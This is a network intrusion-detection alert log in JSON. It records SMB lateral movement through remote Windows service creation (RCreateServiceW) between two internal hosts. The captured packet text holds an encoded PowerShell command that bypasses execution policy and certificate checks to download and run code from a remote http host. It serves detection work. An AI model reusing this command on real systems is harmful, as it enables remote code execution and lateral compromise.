{ "in_iface": "tppdummy0", "event_type": "stamus", "packet_info": { "linktype": 1 }, "metadata": { "flowbits": [ "ET.smbdcerpc.endians", "stamus.scmr.service.ROpenSCManagerW", "stamus.scmr.service.RCreateServiceW" ] }, "proto": "TCP", "smb": { "session_id": 17592186044485, "tree_id": 1, "dialect": "2.10", "id": 9, "dcerpc": { "response": "UNREPLIED", "req": { "frag_cnt": 1, "stub_data_size": 1360 }, "opnum": 12, "interfaces": [ { "uuid": "367abb81-9844-35f1-ad32-98f038001003", "version": "2.0", "name": "svcctl" } ], "endpoint": "CreateServiceW", "call_id": 1, "request": "REQUEST" }, "command": "SMB2_COMMAND_WRITE" }, "stream": 1, "see_id": "fe19238f45f5", "input": { "type": "log" }, "type": "json-log", "src_port": 53793, "payload_printable": "...E.SMBr......H.....................\"..NT LM 0.12..SMB 2.002..SMB 2.???....h.SMB@...........................................................$.......@....................................SMB@.......................................................................X.B.........`@..+......604..0..\n+.....7..\n.\". NTLMSSP..............................SMB@...................................E...................................X..............~0..z...v...rNTLMSSP.........l...............@.......T.......\\.......r.......a.e.l.t.s.a.e.v.s.p.a.u.t.o.S.E.R.V.E.R.2.8...........................}.....(.'.V.. .........B.A....U..k..@.........a.e.l.t.s.a.e.v.s.p.....S.E.R.V.E.R.5.4... .a.e.l.t.s.a.e.v.s.p...l.o.c.a.l...2.S.e.r.v.e.r.5.4...a.e.l.t.s.a.e.v.s.p...l.o.c.a.l... .a.e.l.t.s.a.e.v.s.p...l.o.c.a.l......B.A...................l.SMB@...................................E...........................H.$.\\.\\.1.0...4.4...6.5...5.0.\\.I.P.C.$......SMB@...................................E.......................9.......................................@...x...........s.v.c.c.t.l..........SMB@...................................E.......................1.p.H...................................................H.........................z6D..5.2..8........]..........+.H`.......q.SMB@...................................E.......................1.P.............................................0.....SMB@...................................E.......................1.p.............................................................p.......ua..............N.T.E.B.O.O.W.L.Y.R.P.P.L.H.P.U.C.Q.F.X.....a...............S.e.r.v.i.c.e.s.A.c.t.i.v.e.....?......q.SMB@...................................E.......................1.P.............................................0.....SMB@...................\n...............E.......................1.p.h...................................................h.......P.............|...oK.o0..3f^............N.T.E.B.O.O.W.L.Y.R.P.P.L.H.P.U.C.Q.F.X.....hq..............N.T.E.B.O.O.W.L.Y.R.P.P.L.H.P.U.C.Q.F.X.....................H.......H...%.C.O.M.S.P.E.C.%. ./.C. .\".c.m.d. ./.c. .p.o.w.e.r.s.h.e.l.l...e.x.e. .-.w. .1. . .-.N.o.P.r.o.f.i.l.e. .-.I.n.p.u.t.F.o.r.m.a.t. .N.o.n.e. .-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .B.y.p.a.s.s. .-.e. .W.w.B.T.A.H.k.A.c.w.B.0.A.G.U.A.b.Q.A.u.A.E.4.A.Z.Q.B.0.A.C.4.A.U.w.B.l.A.H.I.A.d.g.B.p.A.G.M.A.Z.Q.B.Q.A.G.8.A.a.Q.B.u.A.H.Q.A.T.Q.B.h.A.G.4.A.Y.Q.B.n.A.G.U.A.c.g.B.d.A.D.o.A.O.g.B.T.A.G.U.A.c.g.B.2.A.G.U.A.c.g.B.D.A.G.U.A.c.g.B.0.A.G.k.A.Z.g.B.p.A.G.M.A.Y.Q.B.0.A.G.U.A.V.g.B.h.A.G.w.A.a.Q.B.k.A.G.E.A.d.A.B.p.A.G.8.A.b.g.B.D.A.G.E.A.b.A.B.s.A.G.I.A.Y.Q.B.j.A.G.s.A.I.A.A.9.A.C.A.A.e.w.A.g.A.C.Q.A.d.A.B.y.A.H.U.A.Z.Q.A.g.A.H.0.A.O.w.A.g.A.E.k.A.b.g.B.2.A.G.8.A.a.w.B.l.A.C.0.A.R.Q.B.4.A.H.A.A.c.g.B.l.A.H.M.A.c.w.B.p.A.G.8.A.b.g.A.g.A.C.g.A.T.g.B.l.A.H.c.A.L.Q.B.P.A.G.I.A.a.g.B.l.A.G.M.A.d.A.A.g.A.F.M.A.e.Q.B.z.A.H.Q.A.Z.Q.B.t.A.C.4.A.T.g.B.l.A.H.Q.A.L.g.B.X.A.G.U.A.Y.g.B.j.A.G.w.A.a.Q.B.l.A.G.4.A.d.A.A.p.A.C.4.A.R.A.B.v.A.H.c.A.b.g.B.s.A.G.8.A.Y.Q.B.k.A.F.M.A.d.A.B.y.A.G.k.A.b.g.B.n.A.C.g.A.I.g.B.o.A.H.Q.A.d.A.B.w.A.D.o.A.L.w.A.v.A.D.A.A.e.A.A.1.A.D.M.A.N.g.A.x.A.D.E.A.N.A.A.1.A.D.E.A.L.w.B.3.A.G.k.A.b.g.A.v.A.G.M.A.b.A.B.v.A.G.M.A.Y.Q.B.s.A.C.I.A.K.Q.A.=.\"...............................", "dest_ip": "10.44.65.50", "flow": { "pkts_toclient": 18, "bytes_toclient": 3348, "dest_ip": "10.44.65.50", "start": "2025-07-24T02:33:20.676738+0000", "bytes_toserver": 4383, "dest_port": 445, "src_ip": "10.44.65.43", "pkts_toserver": 20, "src_port": 53793 }, "alerted": true, "actions_ids": { "threat": "rule_filter_4" }, "net_info": { "src": [ "Organization Acme", "Server Infra" ], "dest": [ "Organization Acme", "Server Infra" ], "src_agg": "server-infra.organization-acme", "dest_agg": "server-infra.organization-acme" }, "tags": [ "beats_input_codec_json_applied" ], "host": "SSProbe-1", "dest_port": 445, "stamus_novel": true, "agent": { "hostname": "SSProbe-1", "type": "filebeat", "id": "9f305fa4-6db1-485c-81f9-598dce1469e3", "ephemeral_id": "f5dbade3-4d0f-4cc4-9c00-dfdb5bfcc92a", "version": "7.17.29", "name": "SSProbe-1" }, "logger": "logstash-manager", "capture_file": "/var/log/suricata/pcaps//log-1753323911-2.pcap", "flow_id": 91821195167311, "packet": "ABf7AAA2ABf7AAAvCABFAAAotqVAAIAGrXUKLEErCixBMtIhAb2NNrsgJTALaFAQBAHIUAAA", "@timestamp": "2025-07-24T02:33:20.758Z", "src_ip": "10.44.65.43", "stamus": { "extra_info": null, "source": "10.44.65.43", "family_name": "Custom Threats", "incidents_id": [ 50 ], "threat_id": 1000000004, "asset_net_info": "server-infra.organization-acme", "pk": 68439, "asset_info": { "last_seen": "2025-07-24T02:33:20.758958Z", "event_id": 64, "first_seen": "2025-07-24T02:33:20.758958Z", "incident_id": 50, "kill_chain": "installation", "state": "new" }, "method_id": 4, "family_type": "family", "event_id": 64, "offender_type": "ip", "asset_type": "ip", "family_id": 1, "threat_name": "Lateral - Policy Bypass Execution", "asset": "10.44.65.50", "kill_chain": "installation" }, "sig": { "sid": 3115102, "created": "2022-03-23", "source": "Lateral SMB", "version": 0, "updated": "2024-08-05" }, "direction": "to_server", "@version": "1", "alert": { "gid": 1, "severity": 3, "source": { "ip": "10.44.65.43", "net_info": [ "Server Infra", "Organization Acme" ], "net_info_agg": "server-infra.organization-acme", "port": 53793 }, "metadata": { "source": [ "smb_lateral" ], "lateral_function": [ "RCreateServiceW" ], "created_at": [ "2022_03_23" ], "lateral_asset": [ "src_ip" ], "updated_at": [ "2024_08_05" ], "stamus_classification": [ "lateral" ], "signature_severity": [ "Critical" ], "provider": [ "Stamus" ], "lateral_key": [ "dcerpc.iface" ] }, "target": { "ip": "10.44.65.50", "net_info": [ "Server Infra", "Organization Acme" ], "net_info_agg": "server-infra.organization-acme", "port": 445 }, "category": "", "lateral": "server infra.organization acme", "rev": 5, "action": "allowed", "signature_id": 3115102, "signature": "SN MS-SCMR service - RCreateServiceW" }, "community_id": "1:INmfLA2CNxpW7B6ObMztk+CXtpY=", "ether": { "src_mac": "00:17:fb:00:00:2f", "dest_mac": "00:17:fb:00:00:36" }, "uuid": "880eb07b-96ef-438c-9928-077afd8b54bd", "app_proto": "smb", "see_name": "stamus-central-server", "tx_id": 8, "log": { "offset": 15219342, "file": { "path": "/var/log/suricata/eve-nsm-1.json" } }, "pkt_src": "wire/pcap", "timestamp": "2025-07-24T02:33:20.758958+0000", "_id": "YapHOpgBsog6-RUOOBCg" }